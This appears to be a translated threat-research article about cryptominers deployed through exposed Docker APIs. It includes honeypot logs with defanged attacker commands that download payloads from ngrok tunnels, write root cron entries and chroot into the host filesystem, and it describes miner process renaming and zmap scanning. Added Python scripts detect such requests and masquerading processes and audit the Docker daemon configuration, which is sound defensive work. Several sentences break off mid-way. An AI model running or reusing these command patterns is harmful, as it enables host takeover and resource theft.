We analysed data collected with honeypot containers that we set up to track threats, and found significant activity from unwanted or unauthorised cryptocurrency miners deployed as malicious containers using an image published publicly on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.
In addition, network tools are installed to break into exposed neighbouring containers and applications.
We leave our honeypots as they are, that is, with default settings, without hardening measures or subsequent installation of additional software. Note that Docker publishes initial setup recommendations for avoiding mistakes and simple vulnerabilities. The honeypots in question, however, are containers designed to detect attacks aimed at the container deployment platform, not at the applications inside the containers.
The malicious activity found is also notable because it requires no vulnerability and is independent of the Docker version. Finding a misconfigured, and therefore exposed, container image is all attackers need to infect many exposed servers.
An unsecured Docker API lets the user perform a wide range of
On the left, the malware delivery method. On the right, the attacker's environment, which allows remote deployment of images.
Distribution by country of the 3762 open Docker APIs. Based on a Shodan search dated 12.02.2019
Attack options and payload
The malicious activity was not discovered with honeypots alone. Shodan data show that the number of exposed Docker APIs (see the second graph) has grown since we investigated a misconfigured container that was being used as a bridge to deploy Monero cryptocurrency mining software. In October of last year (2018; current data
Analysis of the honeypot logs showed that use of the container image was linked to use of
Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"
Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"
Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",
Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"
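The logged requests share one shape: a shell entrypoint, a download from a short-lived tunnel hostname, cron entries written under a directory that turns out to be the host's root, and a chroot into it. The following script is an added example for this page, not code from the original article; it applies those observations as rules to the fields of a container-create request so that a honeypot or API gateway log can be triaged automatically. The first sample request reuses the first logged command (defanged) as it appears above; the Binds entry, the image name and the benign second request are assumptions constructed for the example.

```python
"""Flag Docker container-create requests that look like the honeypot entries above.

Added example for this page, not code from the original article. It applies
simple rules to the fields an exposed Docker API receives in a
POST /containers/create body. Sample requests are constructed; the first Cmd
is copied (defanged) from the log above, the Binds entry is an assumption
about how the host root ended up under /tmp9bedce.
"""
import re
from typing import Dict, List

# (finding name, pattern applied to the container's Cmd string)
CMD_RULES = [
    ("download-via-tunnel", re.compile(r"\b(curl|wget)\b.*ngrok(\[\.\]|\.)io", re.I)),
    ("cron-persistence", re.compile(r">\s*\S*/etc/(crontab|cron\.d/)")),
    ("chroot-into-mount", re.compile(r"\bchroot\s+/\S+")),
]
SHELL_ENTRYPOINTS = {"/bin/sh", "sh", "/bin/bash", "bash"}

SAMPLE_REQUESTS = [
    {
        "Image": "alpine-curl",   # name as given in the article; repository path not shown there
        "Entrypoint": "/bin/sh",
        "Cmd": (
            '-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d '
            '"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";'
            'echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;'
            'echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;'
            'chroot /tmp9bedce sh -c "cron || crond"'
        ),
        "Binds": ["/:/tmp9bedce"],  # assumption: host root mounted at the chroot target
    },
    {
        "Image": "nginx:1.25",      # constructed benign request for contrast
        "Entrypoint": None,
        "Cmd": ["nginx", "-g", "daemon off;"],
        "Binds": ["/srv/www:/usr/share/nginx/html:ro"],
    },
]


def analyze_create_request(req: Dict) -> List[str]:
    """Return the names of every rule the request triggers (empty list if none)."""
    findings: List[str] = []
    cmd = req.get("Cmd") or ""
    if isinstance(cmd, list):          # the API accepts Cmd as a string or an argv list
        cmd = " ".join(cmd)
    for name, pattern in CMD_RULES:
        if pattern.search(cmd):
            findings.append(name)
    for bind in req.get("Binds") or []:
        host_path = bind.split(":", 1)[0]
        if host_path == "/":           # whole host filesystem handed to the container
            findings.append("host-root-bind-mount")
    # A shell entrypoint is normal on its own; report it only alongside other hits.
    if findings and req.get("Entrypoint") in SHELL_ENTRYPOINTS:
        findings.append("shell-entrypoint")
    return findings


def triage(requests: List[Dict]) -> List[Dict]:
    """Summarise a batch of requests, e.g. everything a honeypot logged in a day."""
    return [{"image": r.get("Image"), "findings": analyze_create_request(r)} for r in requests]


if __name__ == "__main__":
    for row in triage(SAMPLE_REQUESTS):
        verdict = "SUSPICIOUS" if row["findings"] else "ok"
        print(f"{verdict:10} {row['image']}: {', '.join(row['findings']) or '-'}")
```

The host-root bind mount is the rule worth keeping even if the others rot: the tunnel hostnames and file names change per sample, but writing a crontab into the host requires the host filesystem to be mounted, and that is visible in the request regardless of how the command is obfuscated.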
As you can see, the payload files are retrieved from constantly changing URLs. These URLs have a short expiry time, so the payload can no longer be retrieved after the expiry date.
There are two payload options. The first is a compiled ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools, which are used to scan network ranges and search for new targets.
The dropper script sets two variables that are then used to deploy the cryptocurrency miner. The HOST variable holds the URL where the malicious files are located, and the RIP variable the file name (in fact a hash) of the miner to be deployed. The HOST variable changes whenever the hash variable changes. The script also tries to check that no other cryptocurrency miners are running on the attacked server.
Examples of the HOST and RIP variables, and the code snippet used to check that no other miners are running.
Before the miner is started, it is renamed to nginx. Other versions of this script rename the mining process to other legitimate services that are likely to be present on Linux systems. This is usually enough to pass a check against the list of running processes.
The scanning script also has its own features. It works with the same URL service to fetch the tools it needs. Among them is the zmap binary, which is used to scan networks and obtain a list of open ports. The script also downloads another binary used to interact with the services found and collect banners from them, to obtain additional information about each service found (for example, its version).
The script also predefines certain network ranges to scan, but this depends on the version of the script. It also sets the target ports of the services, in this case Docker, before performing the scan.
As soon as targets are found, banners are automatically collected from them. The script also filters targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX,
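A process name is trivial to change; the path of the executable that is actually running is not. The script below is an added example for this page, not code from the original article or from Trend Micro: it takes process records of the form `ps` cannot see through (the name shown, and the binary behind it) and reports the mismatches the renamed miner produces, such as an "nginx" that runs from /tmp or whose file has been deleted after start. On Linux it can read live records from /proc; the sample records are constructed, including the miner's file name.

```python
"""Detect a process that calls itself a system service but runs from the wrong place.

Added example for this page, not from the original article. The dropper
described above renames the miner to "nginx" so it blends into ps output;
the name is easy to fake, the path of the running executable is not.
The sample records at the bottom are constructed.
"""
import os
from dataclasses import dataclass
from typing import Dict, List

# Where a packaged service binary is expected to live.
TRUSTED_EXE_DIRS = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/",
                    "/usr/local/sbin/", "/usr/local/bin/", "/usr/lib/", "/usr/libexec/")
# Places a long-running service has no business executing from.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/user/")
# nginx is the name the article's sample borrows; the rest are other common choices.
IMPERSONATED_SERVICES = {"nginx", "httpd", "apache2", "sshd", "cron", "crond", "systemd", "mysqld"}


@dataclass
class ProcRecord:
    pid: int
    comm: str      # /proc/<pid>/comm, what ps and top display
    exe: str       # readlink of /proc/<pid>/exe, the binary actually running


def masquerade_findings(p: ProcRecord) -> List[str]:
    """Return reasons this process looks like a renamed binary; [] if it looks normal."""
    reasons: List[str] = []
    deleted = p.exe.endswith(" (deleted)")          # kernel marks unlinked executables this way
    exe_path = p.exe[: -len(" (deleted)")] if deleted else p.exe
    exe_name = os.path.basename(exe_path)

    if deleted:
        reasons.append("executable was unlinked after start")
    if exe_path.startswith(SCRATCH_DIRS):
        reasons.append(f"runs from scratch directory {exe_path}")
    if p.comm in IMPERSONATED_SERVICES:
        if not exe_path.startswith(TRUSTED_EXE_DIRS):
            reasons.append(f"'{p.comm}' not running from a packaged location ({exe_path})")
        if exe_name != p.comm:
            reasons.append(f"name '{p.comm}' does not match binary '{exe_name}'")
    return reasons


def scan(records: List[ProcRecord]) -> Dict[int, List[str]]:
    """Map pid -> findings for every record that has at least one."""
    return {p.pid: f for p in records if (f := masquerade_findings(p))}


def collect_from_proc() -> List[ProcRecord]:
    """Read live records on Linux; returns [] elsewhere or where /proc is unreadable."""
    records: List[ProcRecord] = []
    try:
        pids = [d for d in os.listdir("/proc") if d.isdigit()]
    except OSError:
        return records
    for pid in pids:
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue      # process exited, or not ours to inspect without root
        records.append(ProcRecord(int(pid), comm, exe))
    return records


# Constructed sample: a genuine nginx worker next to a miner renamed to "nginx".
SAMPLE_PROCS = [
    ProcRecord(1201, "nginx", "/usr/sbin/nginx"),
    ProcRecord(4377, "nginx", "/tmp/.x/miner (deleted)"),   # path and name are made up
]

if __name__ == "__main__":
    live = collect_from_proc()
    for pid, reasons in scan(live or SAMPLE_PROCS).items():
        print(pid, "; ".join(reasons))
```

Run as root the live scan sees every process; as an unprivileged user /proc/<pid>/exe of other users' processes is unreadable and those are skipped, so schedule it with enough privilege or feed it records from an agent that already has them.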
The attack vector is the Docker image, as can be seen in the next two code fragments.
At the top, the renaming to a legitimate service; at the bottom, how zmap is used to scan networks.
At the top, the predefined network ranges; at the bottom, the specific ports used to search for services, including Docker
The screenshot shows that the alpine-curl image has been downloaded more than 10 million times
Based on Alpine Linux and curl, an efficient CLI tool for transferring files over a variety of protocols, you can build
It is important to note that this image (alpine-curl) is not malicious in itself, but as you can see above, it can be used to carry out malicious tasks. Similar Docker images can likewise be used for malicious tasks. We contacted Docker and worked with them on this issue.
Recommendations
The incident discussed in this article highlights the need to consider security from the start, including the following recommendations:
- For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
- Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service) and add encryption to network connections.
- Follow the recommendations and enable the security mechanisms, e.g. those from Docker and its built-in security features.
- Use automated scanning of runtimes and images to get additional information about the processes running in the container (for example, to detect tampering or look for vulnerabilities). Application control and integrity monitoring help track unusual changes to servers, files and system areas.
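The first recommendation, checking that the API only accepts requests it should, comes down to how dockerd is told to listen. The script below is an added example for this page, not code from the original article or from Docker: it parses the `hosts` and `tlsverify` keys of /etc/docker/daemon.json and reports a tcp:// listener that has no client authentication, which is the condition the honeypot traffic above depends on. The two sample configurations are constructed; the certificate paths in the hardened one are placeholders.

```python
"""Audit how dockerd is told to listen, from /etc/docker/daemon.json.

Added example for this page, not from the article or from Docker. dockerd
takes its listeners from the `hosts` list in daemon.json (or -H on its
command line); a tcp:// entry without `tlsverify` accepts API calls from
anyone who can reach the port. Sample configurations are constructed.
"""
import json
import os
from typing import Dict, List
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
DEFAULT_HOSTS = ["unix:///var/run/docker.sock"]   # what dockerd uses when `hosts` is absent


def audit_listener(host: str, tlsverify: bool) -> List[str]:
    """Findings for one entry of the `hosts` list; [] when it is acceptable."""
    url = urlsplit(host)
    if url.scheme in ("unix", "fd", "npipe"):
        return []                                   # local IPC, governed by filesystem permissions
    if url.scheme != "tcp":
        return [f"WARN unrecognised listener {host!r}"]
    addr = url.hostname or "0.0.0.0"                # tcp://:2375 means every interface
    port = url.port or (2376 if tlsverify else 2375)
    if addr in LOOPBACK and not tlsverify:
        return [f"INFO tcp://{addr}:{port} without TLS is reachable by every local user; prefer the unix socket"]
    if not tlsverify:
        return [f"CRITICAL tcp://{addr}:{port} accepts unauthenticated API calls from the network"]
    return [f"INFO tcp://{addr}:{port} requires client certificates; still restrict it with a firewall"]


def audit_daemon_json(text: str) -> Dict[str, List[str]]:
    """Parse daemon.json text and return {listener: findings}."""
    cfg = json.loads(text)
    hosts = cfg.get("hosts") or DEFAULT_HOSTS
    tlsverify = bool(cfg.get("tlsverify", False))
    return {h: audit_listener(h, tlsverify) for h in hosts}


def worst_severity(report: Dict[str, List[str]]) -> str:
    """'CRITICAL', 'WARN', 'INFO' or 'OK' for a whole report."""
    levels = {f.split(" ", 1)[0] for findings in report.values() for f in findings}
    for level in ("CRITICAL", "WARN", "INFO"):
        if level in levels:
            return level
    return "OK"


# Constructed daemon.json contents: the exposed setup the attackers rely on,
# and a hardened one with mutual TLS (certificate paths are placeholders).
EXPOSED_CONFIG = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_CONFIG = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

if __name__ == "__main__":
    path = "/etc/docker/daemon.json"
    if os.path.exists(path):
        with open(path) as fh:
            samples = {path: fh.read()}
    else:
        samples = {"exposed (sample)": EXPOSED_CONFIG, "hardened (sample)": HARDENED_CONFIG}
    for label, text in samples.items():
        report = audit_daemon_json(text)
        print(f"{label}: {worst_severity(report)}")
        for listener, findings in report.items():
            for f in findings:
                print("  ", listener, "->", f)
```

The same listeners can also be set with `-H` on the dockerd command line (typically in the systemd unit), so an audit of a real host has to look at both places; a CRITICAL result here matches the "exposed Docker API" the Shodan figures above count.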
Trend Micro helps DevOps teams build securely, ship fast, and run anywhere. Trend Micro
Indicators of compromise
Related hashes:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
In
Source: www.habr.com